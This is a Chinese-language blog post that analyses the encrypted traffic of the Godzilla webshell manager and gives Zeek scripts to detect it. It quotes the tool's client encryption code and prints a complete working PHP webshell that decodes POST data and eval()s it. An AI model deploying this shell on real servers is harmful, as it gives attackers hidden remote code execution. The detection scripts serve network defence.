写在前面 Godzilla(哥斯拉):
Godzilla (哥斯拉)是一款优秀的WebShell权限管理工具,其特点有:
Zeek (原名:Bro) 是一个开源的网络流量分析器。许多运营商将Zeek作为网络安全监控器(NSM),支持对可疑或恶意活动的调查。Zeek还支持安全领域以外的广泛的流量分析任务,包括性能测量和故障排除。其特点有:
Godzilla: v4.0.1
源码分析 PHP XOR BASE64 客户端
1 2 3 4 5 6 7 8 9 10 public class PhpXor implements Cryption { public void init (ShellEntity context) { this .shell = context; this .http = this .shell.getHttp(); this .key = this .shell.getSecretKeyX().getBytes(); this .pass = this .shell.getPassword(); String findStrMd5 = functions.md5(this .pass + new String(this .key)); this .findStrLeft = findStrMd5.substring(0 , 16 ); this .findStrRight = findStrMd5.substring(16 ); }
对于明文数据使用key 进行按位异或->base64编码->url编码,实现数据加密;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 public byte [] encode(byte [] data) { try { return E(data); } catch (Exception e) { Log.error(e); return null ; } } public byte [] E(byte [] cs) { int len = cs.length; for (int i = 0 ; i < len; i++) { cs[i] = (byte ) (cs[i] ^ this .key[(i + 1 ) & 15 ]); } return (this .pass + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes(); }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 public byte [] decode(byte [] data) { if (data == null || data.length <= 0 ) { return data; } try { return D(findStr(data)); } catch (Exception e) { Log.error(e); return null ; } } public byte [] D(String data) { byte [] cs = functions.base64Decode(data); int len = cs.length; for (int i = 0 ; i < len; i++) { cs[i] = (byte ) (cs[i] ^ this .key[(i + 1 ) & 15 ]); } return cs; } public String findStr (byte [] respResult) { return functions.subMiddleStr(new String(respResult), this .findStrLeft, this .findStrRight); }
演示数据 - 数据解密

服务端 PHP XOR BASE64 类型的加密Shell的服务器端代码如下,其中定义了encode
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 <?php @session_start(); @set_time_limit(0 ); @error_reporting(0 ); function encode ($D ,$K ) { for ($i =0 ;$i <strlen($D );$i ++) { $c = $K [$i +1 &15 ]; $D [$i ] = $D [$i ]^$c ; } return $D ; } $pass ='Happy' ;$payloadName ='payload' ;$key ='bdf2e45b317c4585' ;if (isset ($_POST [$pass ])){ $data =encode(base64_decode($_POST [$pass ]),$key ); if (isset ($_SESSION [$payloadName ])){ $payload =encode($_SESSION [$payloadName ],$key ); if (strpos($payload ,"getBasicsInfo" )===false ){ $payload =encode($payload ,$key ); } eval ($payload ); echo substr(md5($pass .$key ),0 ,16 ); echo base64_encode(encode(@run($data ),$key )); echo substr(md5($pass .$key ),16 ); }else { if (strpos($data ,"getBasicsInfo" )!==false ){ $_SESSION [$payloadName ]=encode($data ,$key ); } } }
JSP AES BASE64 JSP WebShell 则采用了AES加密形式,AES加密的key。同样是计算密钥的MD5值,然后取其前16位用于加密。更深入的分析大家可以去参考,这并不是本文的重点。**【原创】哥斯拉Godzilla加密流量分析 **
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 public void init (ShellEntity context) { this .shell = context; this .http = this .shell.getHttp(); this .key = this .shell.getSecretKeyX(); this .pass = this .shell.getPassword(); String findStrMd5 = functions.md5(this .pass + this .key); this .findStrLeft = findStrMd5.substring(0 , 16 ).toUpperCase(); this .findStrRight = findStrMd5.substring(16 ).toUpperCase(); try { this .encodeCipher = Cipher.getInstance("AES" ); this .decodeCipher = Cipher.getInstance("AES" ); this .encodeCipher.init(1 , new SecretKeySpec(this .key.getBytes(), "AES" )); this .decodeCipher.init(2 , new SecretKeySpec(this .key.getBytes(), "AES" )); this .payload = this .shell.getPayloadModule().getPayload(); if (this .payload != null ) { this .http.sendHttpResponse(this .payload); this .state = true ; } else { Log.error("payload Is Null" ); } } catch (Exception e) { Log.error(e); } } public byte [] encode(byte [] data) { try { return (this .pass + "=" + URLEncoder.encode(functions.base64EncodeToString(this .encodeCipher.doFinal(data)))).getBytes(); } catch (Exception e) { Log.error(e); return null ; } } public byte [] decode(byte [] data) { try { return this .decodeCipher.doFinal(functions.base64Decode(findStr(data))); } catch (Exception e) { Log.error(e); return null ; } }
特征提取 结合上面的分析,传统通过静态特征的匹配方式已不在适用于Godzilla WebShell检测。不过,我们可以将多个特征进行结合实现一个检测的模型来对Godzilla PHP XOR BASE64 WebShell的检测。下面我们来列举一下检测特征:
Godzilla连接WebShell的时会在一次TCP会话中发起3 次HTTP POST请求。
进行了加密,但是初始连接时3次请求中的内容是固定的,所以通过XOR + BASE64编码后的长度是不变的。
请求:3次请求中的key均相等 ,此例中为:Happy
,且2次响应包中的16位数值均相等 ;
PHP XOR BASE64 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 @load base/frameworks/sumstats redef enum Notice : :Type += { WebShell_Godzilla_PHP_XOR_BASE64 }; ## 使用Summary Statistics Framework(统计框架)对http请求进行测量。 event http_message_done (c: connection, is_orig: bool , stat: http_message_stat) { if ( (c?$http) && (c$http?$status_code) && (c$http?$method) && (c$http?$client_body) ) { if ( (c$http$status_code) == 200 && (c$http$method == "POST" ) ) { local key_str: string = c$http$uid + "#####" + cat(c$id$orig_h) + "#####" + cat(c$id$orig_p) + "#####" + cat(c$id$resp_h)+ "#####" + cat(c$id$resp_p) + "#####" + c$http$uri; local observe_str: string = cat(c$http$ts) + "#####" + c$http$client_body + "#####" + c$http$server_body + "#####" + cat(c$http$request_body_len); ## 第一步,创建一个观察器,将数据添加到观察器中。 SumStats::observe("godzilla_php_xor_base64_webshell_event" , [$str=key_str], [$str=observe_str]); } } } event zeek_init () { ## 第二步,根据指定的观察流进行处理,此处采用计算唯一值的方式。 local r1 = SumStats::Reducer($stream = "godzilla_php_xor_base64_webshell_event" , $apply = set (SumStats::UNIQUE)); ## 第三步,创建汇总统计,以便最终对其进行处理。例:当在3 秒的时间窗内满足3 次阈值将会执行以下逻辑; SumStats::create([$name = "godzilla_php_xor_base64_webshell_event.unique" , $epoch = 3 sec, $reducers = set (r1), $threshold = 3.0 , $threshold_val(key: SumStats::Key, result: SumStats::Result) = { return result["godzilla_php_xor_base64_webshell_event" ]$num + 0.0 ; }, $threshold_crossed(key: SumStats::Key, result: SumStats::Result) = { if ( result["godzilla_php_xor_base64_webshell_event" ]$unique == 3 ) { local sig1: bool = F; local sig2: bool = F; local sig3: bool = F; local pass_str_set: set [string ]; local md5_str_set: set [string ]; local key_str_vector: vector of string = split_string(key$str, /#####/); for ( value in result["godzilla_php_xor_base64_webshell_event" ]$unique_vals ) { local observe_str_vector: vector of string = split_string(value$str, /#####/); local client_body = unescape_URI(observe_str_vector[1 ]); local server_body = unescape_URI(observe_str_vector[2 ]); local client_body_len = to_int(observe_str_vector[3 ]); local offset = strstr (client_body, "=" ); local client_body_value = client_body[offset: |client_body|]; ## 获取请求参数 if (offset > 1 ) ## 本例中: Happy=CQNGDVtRLFJcUmEwNTg1FgEVRg%3 D%3 D add pass_str_set[client_body[0 : offset-1 ]]; ## 响应体长度 > 0 ,提取首位各16 字节并检查是否满足MD5格式 if (|server_body| > 0 ) { ## 本例中: 52f 0f23a94a8a3f0e+06 ZTQ1YjMxNKj7Mzhyv7gfMGU0NQ==468e329 e21eb39e8 local server_body_str = server_body[0 : 16 ] + server_body[-16 : ]; local server_body_md5 = find_all_ordered(server_body_str, /[a-zA-Z0-9 ]{32 }/); if (|server_body_md5| == 0 ) return ; add md5_str_set[server_body_str]; } ## 请求体长度 > 52216 && 响应体长度 = 0 if ( (client_body_len > 52216 ) && (|server_body| == 0 ) ) sig1 = T; ## 请求体长度 = 28 && 响应体长度 = 64 if ( (|client_body_value| == 28 ) && (|server_body| == 64 ) ) sig2 = T; ## 请求体长度 = 40 if ( |client_body_value| == 40 ) sig3 = T; } if ( sig1 && sig2 && sig3 ) { ## 判断3 次请求参数是否唯一 ## 判断后2 次提取的MD5值是否唯一 if ( (|pass_str_set| == 1 ) && (|md5_str_set| == 1 ) ) { NOTICE([ $note=WebShell_Godzilla_PHP_XOR_BASE64, $uid=key_str_vector[0 ], $src=to_addr(key_str_vector[1 ]), $dst=to_addr(key_str_vector[3 ]), $msg=fmt("[+] Godzilla(PHP_XOR_BASE64) traffic Detected, %s:%s -> %s:%s, WebShell URI: %s" , key_str_vector[1 ], key_str_vector[2 ], key_str_vector[3 ], key_str_vector[4 ], key_str_vector[5 ]), $sub=cat("Godzilla traffic Detected" ) ]); } } } } ]); }
JSP AES BASE64 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 @load base/frameworks/sumstats redef enum Notice : :Type += { WebShell_Godzilla_JSP_AES_BASE64 }; event http_message_done (c: connection, is_orig: bool , stat: http_message_stat) { if ( c?$http && c$http?$status_code && c$http?$method ) { if ( (c$http$status_code) == 200 && (c$http$method == "POST" ) && (c$http?$client_body) ) { local key_str: string = c$http$uid + "#####" + cat(c$id$orig_h) + "#####" + cat(c$id$orig_p) + "#####" + cat(c$id$resp_h)+ "#####" + cat(c$id$resp_p) + "#####" + c$http$uri; local observe_str: string = cat(c$http$ts) + "#####" + c$http$client_body + "#####" + c$http$server_body + "#####" + cat(c$http$request_body_len); SumStats::observe("godzilla_jsp_aes_base64_webshell_event" , [$str=key_str], [$str=observe_str]); } } } event zeek_init () { local r1 = SumStats::Reducer($stream = "godzilla_jsp_aes_base64_webshell_event" , $apply = set (SumStats::UNIQUE)); SumStats::create([$name = "godzilla_jsp_aes_base64_webshell_event.unique" , $epoch = 5 sec, $reducers = set (r1), $threshold = 3.0 , $threshold_val(key: SumStats::Key, result: SumStats::Result) = { return result["godzilla_jsp_aes_base64_webshell_event" ]$num + 0.0 ; }, $threshold_crossed(key: SumStats::Key, result: SumStats::Result) = { if ( result["godzilla_jsp_aes_base64_webshell_event" ]$unique == 3 ) { local sig1: bool = F; local sig2: bool = F; local sig3: bool = F; local pass_str_set: set [string ]; local md5_str_set: set [string ]; local key_str_vector: vector of string = split_string(key$str, /#####/); for ( value in result["godzilla_jsp_aes_base64_webshell_event" ]$unique_vals ) { local observe_str_vector: vector of string = split_string(value$str, /#####/); local client_body = unescape_URI(observe_str_vector[1 ]); local server_body = unescape_URI(observe_str_vector[2 ]); local client_body_len = to_int(observe_str_vector[3 ]); local offset = strstr (client_body, "=" ); local client_body_value = client_body[offset: |client_body|]; ## 获取 WebShell Password Key if (offset > 1 ) add pass_str_set[client_body[0 : offset-1 ]]; if (|server_body| > 0 ) { local server_body_str = server_body[0 : 16 ] + server_body[-16 : ]; local server_body_md5 = find_last(server_body_str, /[a-zA-Z0-9 ]{32 }/); add md5_str_set[server_body_md5]; } ## 请求体长度 > 48500 && 响应体长度 = 0 if ( (client_body_len > 48500 ) && (|server_body| == 0 ) ) sig1 = T; ## 请求体长度 = 64 && 响应体长度 = 76 if ( (|client_body_value| == 64 ) && (|server_body| == 76 ) && (server_body_str == server_body_md5) ) sig2 = T; ## 请求体长度 = 88 if ( |client_body_value| == 88 && (server_body_str == server_body_md5) ) sig3 = T; } ## 判断3 次请求体中Password Key 是否唯一、判断2 、3 次的响应体中的是否MD5是否唯一 if ( (|pass_str_set| == 1 ) && (|md5_str_set| == 1 ) ) if ( sig1 && sig2 && sig3 ) { NOTICE([ $note=WebShell_Godzilla_JSP_AES_BASE64, $uid=key_str_vector[0 ], $src=to_addr(key_str_vector[1 ]), $dst=to_addr(key_str_vector[3 ]), $msg=fmt("[+] Godzilla(JSP_AES_BASE64) traffic Detected, %s:%s -> %s:%s, WebShell URI: %s" , key_str_vector[1 ], key_str_vector[2 ], key_str_vector[3 ], key_str_vector[4 ], key_str_vector[5 ]), $sub=cat("Godzilla traffic Detected" ) ]); } } } ]); }